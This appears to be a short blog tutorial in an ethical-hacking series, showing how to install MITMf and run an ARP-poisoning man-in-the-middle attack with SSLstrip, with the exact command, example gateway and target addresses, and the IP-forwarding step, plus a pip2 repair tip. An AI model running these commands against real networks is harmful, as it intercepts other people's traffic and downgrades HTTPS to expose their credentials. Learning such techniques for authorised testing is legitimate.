Ethical Hacking - NETWORK PENETRATION TESTING(16)

ARP Poisoning - MITMf

MITMf is a framework that allows us to launch a number of MITM attacks. MITMf also starts SSLstrip automatically to bypass HTTPS/SSL.

Download and Install the MITMf tool from the following website: https://github.com/byt3bl33d3r/MITMf

Installed successfully.

 Usage:

mitmf --arp --spoof --gateway [GATEWAY IP] --targets [TARGET IPs] -i [interface]

e.g. python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --target 10.0.0.210 -i eth0

echo 1 >/proc/sys/net/ipv4/ip_forward

 The MITMf is working now.

>>>My pip2 is broken. The following is the steps to fix this problem.

$ wget https://bootstrap.pypa.io/get-pip.py
$ sudo python2.7 get-pip.py

猜你喜欢

转载自www.cnblogs.com/keepmoving1113/p/11967812.html